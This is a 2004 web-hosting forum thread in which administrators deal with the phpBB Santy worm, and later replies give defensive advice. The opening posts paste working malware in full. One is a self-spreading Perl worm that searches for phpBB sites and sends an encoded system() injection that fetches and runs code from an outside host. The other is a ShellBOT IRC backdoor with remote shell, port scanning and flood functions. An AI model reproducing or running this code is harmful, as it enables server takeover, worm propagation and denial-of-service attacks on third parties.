The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacked ? Perl files in tmp - high load

Discussion in 'General Discussion' started by jeroman8, Dec 24, 2004.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    On 2 of our server there is files created in tmp direcory.
    It's PERL files and they are running and causing heavy load on the system.
    When I delete these files and kill the processes all is fine for a little while
    but then the files is back and running.

    The files is owned by user nobody

    How do I track from where these files is created ?
    If it's SSH or if it's from a board script or other php script that is bad...

    What should I do :-( -- I have no idea !!
    If anyone here is willing to work with this please let me know and I will be happy
    to pay for your services, e-mail: jerry@jr-media.biz

    Here's 2 of the scripts and some of the names it's called:

    worm.txt, unbot.txt, boot.txt and then some crazy filesnames also...
    There is several files named like this and copies like worm1.txt, worm2.txt....

    Worm.txt =

    -------------------------------------------------------------------------------------

    #/usr/bin/perl

    use IO::Socket;
    use LWP::Simple;
    my $processo = "/usr/bin/httpd -DSSL";
    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);


    @vul = "";
    $a=0;
    $numero = int rand(999);
    $site = "www.google.com";
    $procura = "inurl:viewtopic.php?t=$numero";

    ######################################
    for($n=0;$n<90;$n += 10){
    $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
    print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
    @resu = <$sock>;
    close($sock);
    $ae = "@resu";
    while ($ae=~ m/<a href=.*?>.*?<\/a>/){
    $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
    $uber=$1;
    if ($uber !~/translate/)
    {if ($uber !~ /cache/)
    {if ($uber !~ /"/)
    {if ($uber !~ /google/)
    {if ($uber !~ /216/)
    {if ($uber =~/http/)
    {if ($uber !~ /start=/)
    {
    if ($uber =~/&/)
    {
    $nu = index $uber, '&';
    $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    $a++;
    }}}}}}}}}
    ##########################
    for($cadenu=1;$cadenu <= 99; $cadenu +=10){

    @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
    $ae = "@cade";

    while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
    $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
    $uber=$1;

    $uber =~ s/ //g;
    $uber =~ s/<b>//g;
    $uber =~ s/<\/b>//g;
    $uber =~ s/<wbr>//g;

    if ($uber =~/&/)
    {
    $nu = index $uber, '&';
    $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    $a++
    }}

    #########################


    $cmd = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr'.'(99)%252echr(111)%252echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';


    $b = scalar(@vul);

    for($a=0;$a<=$b;$a++)
    {

    $sitevul = $vul[$a] . $cmd;
    if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }
    $res = get($sitevul) or next;
    }
     
  2. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    ----------------------------------------------------------------------------------------------------
    the beginning of bot.txt =

    #!/usr/bin/perl
    #
    # ShellBOT - Atrix Team
    #
    # 0ldW0lf - oldwolf@atrix-team.org
    # - www.atrix-team.org
    # - www.atrix.cjb.net
    #
    # modificado por poerschke
    # irc.gigachat.net #spykids
    #
    ################ CONFIGURACAO #################################################################
    my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps #
    #----------------------------------------------################################################
    my $linas_max="10"; # Evita o flood :) depois de X linhas #
    #----------------------------------------------################################################
    my $sleep="4"; # ele dorme X segundos #
    ##################### IRC #####################################################################
    @adms=("poerschke"); # Nick do administrador #
    #----------------------------------------------################################################
    my @canais=("#perl"); # Caso haja senha ("#canal :senha") #
    #----------------------------------------------################################################
    my $nick="spykids"; # Nick do bot. Caso esteja em uso vai aparecer #
    # aparecer com numero radonamico no final #
    #----------------------------------------------################################################
    my $ircname = "worm"; # User ID #
    #----------------------------------------------################################################
    chop (my $realname = `uname -a`); # Full Name #
    #----------------------------------------------################################################
    $servidor="irc.gigachat.net" unless $servidor; # Servidor de irc que vai ser usado #
    # caso não seja especificado no argumento #
    #----------------------------------------------################################################
    my $porta="6667"; # Porta do servidor de irc #
    ################ ACESSO A SHELL ###############################################################
    my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
    ###############################################################################################

    my $VERSAO = "0.2";

    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";

    use IO::Socket;
    use Socket;
    use IO::Select;
    chdir("/");
    $servidor="$ARGV[0]" if $ARGV[0];
    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);



    our %irc_servers;
    our %DCC;
    my $dcc_sel = new IO::Select->new();

    #############################
    # B0tchZ na veia ehehe :P #
    #############################

    $sel_cliente = IO::Select->new();
    sub sendraw {
    if ($#_ == "1") {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
    print $IRC_cur_socket "$_[0]\n";
    }
    }

    sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);

    $irc_servers{$IRC_cur_socket}{"host"} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{"porta"} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
    $irc_servers{$IRC_cur_socket}{"meuip"} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;
    }

    }
    my $line_temp;
    while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    delete($irc_servers{""}) if (defined($irc_servers{""}));
    &DCC::connections;
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{"nick"};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
    $sel_cliente->remove($fh);
    $fh->close;
    delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);

    for(my $c=0; $c<= $#lines; $c++) {
    $line = $lines[$c];
    $line=$line_temp.$line if ($line_temp);
    $line_temp="";
    $line =~ s/\r$//;
    unless ($c == $#lines) {
    parse("$line");
    } else {
    if ($#lines == 0) {
    parse("$line");
    } elsif ($lines[$c] =~ /\r$/) {
    parse("$line");
    } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
    parse("$line");
    } else {
    $line_temp = $line;
    }
    }
    }
    }
    }



    sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
    notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
    }
    if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
    if ($onde eq "$meunick"){
    shell("$pn", "$args");
    }
    if ($args =~ /^(\Q$meunick\E|\!atrix)\s+(.*)/ ) {
    my $natrix = $1;
    my $arg = $2;
    if ($arg =~ /^\!(.*)/) {
    ircase("$pn","$onde","$1") unless ($natrix eq "!atrix" and $arg =~ /^\!nick/);
    } elsif ($arg =~ /^\@(.*)/) {
    $ondep = $onde;
    $ondep = $pn if $onde eq $meunick;
    bfunc("$ondep","$1");
    } else {
    shell("$onde", "$arg");
    }
    }
    }
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
    if (lc($1) eq lc($meunick)) {
    $meunick=$4;
    $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
    }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
    nick("$meunick".int rand(9999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
    $meunick = $2;
    $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
    $irc_servers{$IRC_cur_socket}{"nome"} = "$1";
    foreach my $canal (@canais) {
    sendraw("JOIN $canal");
    }
    }
    }

    sub bfunc {
    my $printl = $_[0];
    my $funcarg = $_[1];
    if (my $pid = fork) {
    waitpid($pid, 0);
    } else {
    if (fork) {
    exit;
    } else {
    if ($funcarg =~ /^portscan (.*)/) {
    my $hostip="$1";
    my @portas=( 44464, 4444, 14589, 666, 6666, 6968, 26092, 530, 46256, 31337,
    2222, 3879, 30464, 40193, 36864, 33270, 36864, 40193, 30464,
    8008, 1234, 6969, 7788, 1524, 10000, 12321, 43690, 3333,
    9999, 8975, 16705, 2313, 21317, 36864, 13330, 58821, 6682, 5678,
    45295, 65535, 26112, 7512, 24876, 9191, 5321, 50766, 1492, 12345,
    12346, 6969, 6970, 12666, 1666, 80, 21, 23, 25, 110, 5252, 9988,
    41254, 5074, 139, 44123);
    my (@aberta, %porta_banner);
    foreach my $porta (@portas) {
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => "tcp", Timeout => 4);
    if ($scansock) {
    push (@aberta, $porta);
    $scansock->close;
    }
    }

    if (@aberta) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
    } else {
    sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
    }
    }




    if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
    my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
    $dtime = 1 if $dtime == 0;
    my %bytes;
    $bytes{igmp} = $2 * $pacotes{igmp};
    $bytes{icmp} = $2 * $pacotes{icmp};
    $bytes{o} = $2 * $pacotes{o};
    $bytes{udp} = $2 * $pacotes{udp};
    $bytes{tcp} = $2 * $pacotes{tcp};

    .... and it continues...
     
  3. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    The first one looks like the phpBB worm makeing the rounds ( a few varients out there i believe ). The second is probably a bot used for evil puposes. I'd hire someone that knows the ins and outs of your OS to help lock you down and secure your phpBB setup ( they're probably all exploited by now ).
     
  4. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Yup, phpBB worm - it's spreading at an alarming rate too. There is a handy WHM cPanel Pro Addon tool for checking for installations on your server.
     
  5. XPerties

    XPerties Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    401
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA

    And mind telling us what the handy tool is called?
     
  6. netlook

    netlook Well-Known Member
    PartnerNOC

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    16
    I think first of all the 'system' command should be in disabled_functions at php.ini :cool:
     
  7. fmalekpour

    fmalekpour Well-Known Member
    PartnerNOC

    Joined:
    Dec 4, 2002
    Messages:
    85
    Likes Received:
    0
    Trophy Points:
    6
    Try to rename the "wget":
    mv /usr/bin/wget /usr/bin/wget.renamed123009867

    then use the "Addon Script Manager" in WHM (it's in "Add-ons" section) to upgrade all phpBB forums.

    - Farhad
     
  8. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA
    guys I got hit today with this. I patched everything I thought like on the 21st. I updaded apache also. I started moving all the phpBB installs that looked old to the users root folders.. and the versions that were installed from cPanel I upgraded and verified as ok.

    this morning at 4am my MRTG loads ramped up with 99% /hsphere/apache thing in TOP and my loads stayed there. I found 3 processes. Killed them ..looked in temp and the time stamp on the worm and bot files was Dec24 10am . Now what I am doing is trying to lock down long enough to do the x-mas thing with family. I waxed /tmp crap and chmod 000 wget for now.

    What I would don't have is a knowledge yet on what this nasty little bastard does and what needs to be cleaned up and most important what to grep for in the logs so I can figure out what site was the problem. I found one phpnuke site that I removed but that was back 4 days ago.

    Can you guys help me out ... running out of time today. I guess I could grep the httpd logs for a certain string or something? what's the quickest way to find this sucka? I might have some bots running maybe???? thanks in advance guys ..will check back in a few.

    OH ..doesn't this thing rewrite some php files? what string to seach for and easiest way to just search and look in /home/users/public_html/* ???

    I think maybe I was too late with my patches and he is been sitting there waiting for last night.
     
  9. fmalekpour

    fmalekpour Well-Known Member
    PartnerNOC

    Joined:
    Dec 4, 2002
    Messages:
    85
    Likes Received:
    0
    Trophy Points:
    6
    It's a worm not a hacker, keep the wget permission to 700 will prevent it to work properly.

    PS: Any one knowes how to filter GET commands at the entry point of apache, I know there are some filtering systems on Apache 2 but cpanel uses 1.3 :confused:


    - Farhad
     
  10. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    Guys, this really has been extensively discussed the past few days, if you have a search on these forums you'll find some information on how to prevent and help and resolve these issues. I really don't have the time to post more info but this might be of assistance:
    http://forums.cpanel.net/showpost.php?p=159778&postcount=13

    We all don't have much time, but honestly the info is here and at webhostingtalk.com. Have a search and you all should be able to sort this out and keep some sort of sanity during the holidays!

    Best wishes all!

    PS. Subscribe to bugtraq at securityfocus.com and search through the logs, some interesting information and usually this sort of stuff is posted there before anywhere else ( depends ).
     
  11. XPerties

    XPerties Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    401
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    Sorry ol' mighty one. For your info, I did use the search function. Forgive me for not finiding the correct post.

    Happy holidays.
     
  12. eagle

    eagle Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    141
    Likes Received:
    0
    Trophy Points:
    16
    Okay, removed the files, chmodded wget and the new files are not coming in anymore.

    But, the worm is present:


    So it probably hides in a file somewhere.

    Killing perl and restarting apache doesn't help. Does anyone have an idea of how to find this sucker? I really don't see a solution in the mentioned threads.

    I had the second version, also with the irc bot.

    Thanks
     
  13. fmalekpour

    fmalekpour Well-Known Member
    PartnerNOC

    Joined:
    Dec 4, 2002
    Messages:
    85
    Likes Received:
    0
    Trophy Points:
    6
    It comes from outside, search for spybot.txt in domlogs (/usr/local/apache/domlogs) to find which account of yours is the target.

    Also "Addon Script Manager" in CPanel pro can help you to find out dated installes of phpBB.
     
  14. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA

    Just narrowed down the site in 2 minutes!!! thanks for the help ..simple answer really helped me out here. In my case it was a postnuke site :(
     
  15. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA
    guys it looks like I was hit with what they are calling sanity.c or santy.c worm. I found a ton of files in /tmp

    terrorworm.txt
    worm1.txt

    and a bunch more. I am worried about bots running. wget is locked down now and no abnormal behavior on this box that I can see. What would you guys do to look for stuff this thing could have done?
     
  16. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    The apache module mod_security does this.
     
  17. eagle

    eagle Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    141
    Likes Received:
    0
    Trophy Points:
    16
    You're right. I looked in the wrong place. Thanks.
     
Loading...

Share This Page